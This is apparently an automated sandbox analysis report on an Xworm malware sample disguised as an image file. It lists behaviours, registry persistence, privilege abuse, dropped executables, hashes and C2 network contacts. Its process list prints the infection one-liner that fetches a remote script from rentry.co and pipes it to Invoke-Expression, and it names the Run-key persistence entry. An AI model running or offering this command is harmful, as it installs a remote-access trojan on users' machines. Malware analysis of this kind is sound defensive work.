Analysis Overview
SHA256
21d23e31dae4ca8e6e3c782ad3794251a20b7b4b8244d977e566cd31852e5d38
Threat Level: Known bad
The file download (3).jfif was found to be: Known bad.
Malicious Activity Summary
Xworm
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Downloads MZ/PE file
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-15 10:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-15 10:17
Reported
2024-06-15 10:19
Platform
win10-20240404-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4788 created 580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\svchost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe" | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4788 set thread context of 1820 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\svchost32.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 15 Jun 2024 10:18:39 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1718446718" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\svchost32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\x4s.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeAuditPrivilege | N/A | c:\windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\download (3).jpg"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell "irm rentry.co/el3rabtweakpc/raw | iex"
C:\Windows\svchost32.exe
"C:\Windows\svchost32.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\x4s.exe
"C:\Users\Admin\AppData\Local\Temp\x4s.exe"
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{d2180955-611f-4230-a320-e51bdaf1c103}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.co | udp |
| US | 172.67.75.40:80 | rentry.co | tcp |
| US | 172.67.75.40:443 | rentry.co | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 40.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | news-accept.gl.at.ply.gg | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | i.ibb.co | udp |
| FR | 162.19.58.158:443 | i.ibb.co | tcp |
| US | 8.8.8.8:53 | 158.58.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiznon.000webhostapp.com | udp |
| US | 145.14.144.114:443 | wiznon.000webhostapp.com | tcp |
| US | 8.8.8.8:53 | 114.144.14.145.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wiz.bounceme.net | udp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 147.185.221.20:24727 | news-accept.gl.at.ply.gg | tcp |
| US | 65.191.34.109:6000 | wiz.bounceme.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1skdrhqn.tj2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Windows\svchost32.exe
| MD5 | de68372979221ee19e301cd657bdb1b6 |
| SHA1 | 4266ce79f32422735a99259c27749b6d7fbe158e |
| SHA256 | 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a |
| SHA512 | 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16 |
C:\Users\Admin\AppData\Local\Temp\x4s.exe
| MD5 | 7d333fbc75b9264d3b631861794a7641 |
| SHA1 | 165e2b6ad994fe9bab44154e3812b2e8825dfa76 |
| SHA256 | b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf |
| SHA512 | 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3 |
C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |